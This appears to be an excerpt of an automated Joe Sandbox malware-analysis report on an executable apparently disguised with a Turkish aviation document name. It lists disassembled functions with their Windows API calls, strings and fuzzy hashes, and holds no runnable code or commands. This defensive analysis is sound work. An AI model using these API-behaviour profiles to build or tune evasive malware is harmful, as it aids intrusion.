                                                                                                                                    • Instruction Fuzzy Hash: 00412A31618680FECF399B2DD88C76A7B96BB56318F15843DF087D6660C772A983CB11
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00212D1B
                                                                                                                                    • GetDC.USER32(00000000), ref: 00212D23
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00212D2E
                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00212D3A
                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00212D76
                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00212D87
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00215A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00212DC2
                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00212DE1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                    • Opcode ID: bf59379984e8beaf3d0453a6774fcbf6a27f787662e25b5363980aa482322241
                                                                                                                                    • Instruction ID: 0bf5776185cebb657e642a2779bd8cb4d85be99cbb6ead10e2be183cba8aea8d
                                                                                                                                    • Opcode Fuzzy Hash: bf59379984e8beaf3d0453a6774fcbf6a27f787662e25b5363980aa482322241
                                                                                                                                    • Instruction Fuzzy Hash: E631BF76251214BFEB144F10EC89FEB3BADEF59711F148055FE089A291CA758C60CBA0
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memcmp
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                    • Opcode ID: 1232b9acc94d3e98883531ae7e34782102553b8b05335a91a47f99401e4b8b56
                                                                                                                                    • Instruction ID: aad682d01e70a9c4c072f73bfb1202a44e32545844190b88e6e824f3b0b22e87
                                                                                                                                    • Opcode Fuzzy Hash: 1232b9acc94d3e98883531ae7e34782102553b8b05335a91a47f99401e4b8b56
                                                                                                                                    • Instruction Fuzzy Hash: D1219565A50E497B97189A228E92FFF339FBE3A39CF540021FD049A581F760ED6081E5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                    • Opcode ID: da1a726a62b8ec0c24c714b2e56fa2438e0bf79ea9cd1cfe54794355078a01cd
                                                                                                                                    • Instruction ID: 2258cf76653e22f3d9879ab07bc9f9cb51d1784cfdb0f0a23fa16b55bf7988ef
                                                                                                                                    • Opcode Fuzzy Hash: da1a726a62b8ec0c24c714b2e56fa2438e0bf79ea9cd1cfe54794355078a01cd
                                                                                                                                    • Instruction Fuzzy Hash: 2BD1B175A1071AAFDF10CFA8C881BAEB7B5BF48344F148069E915AB282E770DD55CF90
                                                                                                                                    APIs
                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001C15CE
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C1651
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001C17FB,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C16E4
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C16FB
                                                                                                                                      • Part of subcall function 001B3820: RtlAllocateHeap.NTDLL(00000000,?,00251444,?,0019FDF5,?,?,0018A976,00000010,00251440,001813FC,?,001813C6,?,00181129), ref: 001B3852
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001C17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001C1777
                                                                                                                                    • __freea.LIBCMT ref: 001C17A2
                                                                                                                                    • __freea.LIBCMT ref: 001C17AE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                    • Opcode ID: 50fc3e37401767ccbe7f6defab4a7ebfcfedfec34f12fe91bd717af64f9727b1
                                                                                                                                    • Instruction ID: a1d0044614d0da300c02748d40219f8493bb6e2ce8a2a57d6d12afbe8a5274ff
                                                                                                                                    • Opcode Fuzzy Hash: 50fc3e37401767ccbe7f6defab4a7ebfcfedfec34f12fe91bd717af64f9727b1
                                                                                                                                    • Instruction Fuzzy Hash: C291A472E80216BADF248E64C891FEE7BB5AF6B310F18465DE905E7142DB35DC40CB60
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                    • Opcode ID: 3022e748e026fc5e4af088d31c8758d6db80296a08026a4a8dac240d9dabbb7f
                                                                                                                                    • Instruction ID: 9b236b97faf785d04085a545e87faf14c37304ef328421cba9b11abea00d7b27
                                                                                                                                    • Opcode Fuzzy Hash: 3022e748e026fc5e4af088d31c8758d6db80296a08026a4a8dac240d9dabbb7f
                                                                                                                                    • Instruction Fuzzy Hash: FA91D1B0A10315ABDF24DFA4C844FAEBBB8EF46710F108559F615AB292D7709951CFA0
                                                                                                                                    APIs
                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 001F125C
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 001F1284
                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001F12A8
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F12D8
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F135F
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F13C4
                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001F1430
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                    • Opcode ID: d3a4c0baa0afb99d29ca8c68e11c75f7a470548b26fbf048a1061eb7cb597b00
                                                                                                                                    • Instruction ID: cde4c7a8cb2f6fff935804a9028b032ecc83cc0c3129f27fe5892095452be370
                                                                                                                                    • Opcode Fuzzy Hash: d3a4c0baa0afb99d29ca8c68e11c75f7a470548b26fbf048a1061eb7cb597b00
                                                                                                                                    • Instruction Fuzzy Hash: 6891CF76A00209EFDB05DFA8D884BFEB7B5FF55325F214029EA10EB291D774A941CB90
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3225163088-0
                                                                                                                                    • Opcode ID: cbb01922c5906a73b08ff5ccde44a7a810d5702ea1371517aad8bca0de24c825
                                                                                                                                    • Instruction ID: 615b536176d8de7369d200d3a06ba57aebc4e84274cc710fef846aa4c99a75df
                                                                                                                                    • Opcode Fuzzy Hash: cbb01922c5906a73b08ff5ccde44a7a810d5702ea1371517aad8bca0de24c825
                                                                                                                                    • Instruction Fuzzy Hash: D1914671D40219EFDF14CFA9C888AEEBBB8FF49320F25814AE515B7291D734A941CB60
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0020396B
                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00203A7A
                                                                                                                                    • _wcslen.LIBCMT ref: 00203A8A
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00203C1F
                                                                                                                                      • Part of subcall function 001F0CDF: VariantInit.OLEAUT32(00000000), ref: 001F0D1F
                                                                                                                                      • Part of subcall function 001F0CDF: VariantCopy.OLEAUT32(?,?), ref: 001F0D28
                                                                                                                                      • Part of subcall function 001F0CDF: VariantClear.OLEAUT32(?), ref: 001F0D34
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                    • Opcode ID: 950f4f0d694e623c275ce012b42b48ce81ac09db68748f5b7c7b911696092bae
                                                                                                                                    • Instruction ID: 841bec2750669e8c5ef540bbe4f3c3a13aa297d70c124bf74ffff06df5db6edc
                                                                                                                                    • Opcode Fuzzy Hash: 950f4f0d694e623c275ce012b42b48ce81ac09db68748f5b7c7b911696092bae
                                                                                                                                    • Instruction Fuzzy Hash: 1E9149746183059FC704EF24C48096AB7E8FF99318F14882DF8999B392DB31EE55CB92
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001E000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?,?,001E035E), ref: 001E002B
                                                                                                                                      • Part of subcall function 001E000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0046
                                                                                                                                      • Part of subcall function 001E000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?,?), ref: 001E0054
                                                                                                                                      • Part of subcall function 001E000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001DFF41,80070057,?), ref: 001E0064
                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00204C51
                                                                                                                                    • _wcslen.LIBCMT ref: 00204D59
                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00204DCF
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00204DDA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                    • Opcode ID: 4233a58510704a0e0a9a04e7566e77931606d2537f05825c4ece31704f50fbc8
                                                                                                                                    • Instruction ID: d29759ab542c98e0893d32251a5b13e6b0785132ee334a54a35389884ebe4072
                                                                                                                                    • Opcode Fuzzy Hash: 4233a58510704a0e0a9a04e7566e77931606d2537f05825c4ece31704f50fbc8
                                                                                                                                    • Instruction Fuzzy Hash: 0B913AB1D0021D9FDF15EFA4D890AEEB7B8BF18304F10816AE915B7291EB709A54CF60
                                                                                                                                    APIs
                                                                                                                                    • GetMenu.USER32(?), ref: 00212183
                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 002121B5
                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002121DD
                                                                                                                                    • _wcslen.LIBCMT ref: 00212213
                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 0021224D
                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 0021225B
                                                                                                                                      • Part of subcall function 001E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001E3A57
                                                                                                                                      • Part of subcall function 001E3A3D: GetCurrentThreadId.KERNEL32 ref: 001E3A5E
                                                                                                                                      • Part of subcall function 001E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001E25B3), ref: 001E3A65
                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002122E3
                                                                                                                                      • Part of subcall function 001EE97B: Sleep.KERNEL32 ref: 001EE9F3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4196846111-0
                                                                                                                                    • Opcode ID: 46a59756fb039b60fa944e1dad536ed5102bb4f2034ec83d2fb586a4c550074a
                                                                                                                                    • Instruction ID: d037a3d87d8be9b8c2fac10ea36d662873f65668a27c706987255644515a7aee
                                                                                                                                    • Opcode Fuzzy Hash: 46a59756fb039b60fa944e1dad536ed5102bb4f2034ec83d2fb586a4c550074a
                                                                                                                                    • Instruction Fuzzy Hash: 2B718E35A10205EFCB10EF68C845AEEB7F5EF68310F148458F816EB341DB74AA918B90
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 001EAEF9
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 001EAF0E
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 001EAF6F
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 001EAF9D
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 001EAFBC
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 001EAFFD
                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001EB020
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: 9b8a00d2bd41cc948cbb8c1a7ebd0f28414269b005a5978c74190de61081ae78
                                                                                                                                    • Instruction ID: e89780d63e6afcb16519642afddb481e1c93b628b0ddcbdebba827c47288e885
                                                                                                                                    • Opcode Fuzzy Hash: 9b8a00d2bd41cc948cbb8c1a7ebd0f28414269b005a5978c74190de61081ae78
                                                                                                                                    • Instruction Fuzzy Hash: 9A51B1A0608BD53DFB3683368885BBFBEA95F06704F088589F2D9558D2C798BCC8D751
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(00000000), ref: 001EAD19
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 001EAD2E
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 001EAD8F
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001EADBB
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001EADD8
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001EAE17
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001EAE38
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: 1e3da9a84fcf0314b689cd64d17989acc9a6b96c6141fdca51bf36e2ed1b61ca
                                                                                                                                    • Instruction ID: 75c71725a8743eda32b993b1380f08dd5bfda46b93958586d592b16c4305a94a
                                                                                                                                    • Opcode Fuzzy Hash: 1e3da9a84fcf0314b689cd64d17989acc9a6b96c6141fdca51bf36e2ed1b61ca
                                                                                                                                    • Instruction Fuzzy Hash: 6B5116A0548BD53DFB3783768C95BBEBEA96F46300F488488E1D5468C2C394FC88D762
                                                                                                                                    APIs
                                                                                                                                    • GetConsoleCP.KERNEL32(001C3CD6,?,?,?,?,?,?,?,?,001B5BA3,?,?,001C3CD6,?,?), ref: 001B5470
                                                                                                                                    • __fassign.LIBCMT ref: 001B54EB
                                                                                                                                    • __fassign.LIBCMT ref: 001B5506
                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,001C3CD6,00000005,00000000,00000000), ref: 001B552C
                                                                                                                                    • WriteFile.KERNEL32(?,001C3CD6,00000000,001B5BA3,00000000,?,?,?,?,?,?,?,?,?,001B5BA3,?), ref: 001B554B
                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,001B5BA3,00000000,?,?,?,?,?,?,?,?,?,001B5BA3,?), ref: 001B5584
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                    • Opcode ID: 8f16cf400e049523cfa7137b6d341cfbff6bbe87a815c11a4ca2fc066ace3e89
                                                                                                                                    • Instruction ID: 652a2c4d86798449743e04dbf94a79c32bb42956ffabcec25b9204df2fe9eabc
                                                                                                                                    • Opcode Fuzzy Hash: 8f16cf400e049523cfa7137b6d341cfbff6bbe87a815c11a4ca2fc066ace3e89
